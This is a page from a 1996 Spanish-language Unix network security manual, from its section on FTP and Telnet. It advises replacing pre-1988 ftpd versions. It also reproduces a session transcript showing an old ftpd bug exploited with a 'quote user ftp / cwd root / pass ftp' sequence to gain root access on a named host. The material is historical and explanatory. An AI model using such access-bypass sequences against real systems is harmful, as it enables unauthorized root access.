next up previous contents
Next: El servicio de Up: Seguridad en red Previous: Seguridad del DNS

FTP y Telnet

El protocolo de transferencia de ficheros(FTP), se implementa mediante los programas ftp y ftpd[Sun88]. Las viejas versiones de los mismos presentaban ciertos fallos de seguridad. Para el ftpd, si se dispone de una versión de antes de diciembre de 1988, es preciso cambiarla. Una de las posibilidades que ofrece este servicio es el FTP anónimo, para la distribución de software público. Existía por ejemplo un antiguo bug del ftp mediante el cual conseguíamos accesos de root[FV86]:

% ftp -n
ftp> open ribera.tel.uva.es
Connected to ribera.tel.uva.es
220 ribera.tel.uva.es FTP server ready
ftp> quote user ftp
331 guest login ok, send ident as password.
ftp> quote cwd root
530 Please login with USER and PASS
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
si esto funciona habremos entrado como root en el sistema.

Celestino Gomez Cid (adm)
Fri Mar 22 16:20:52 MET 1996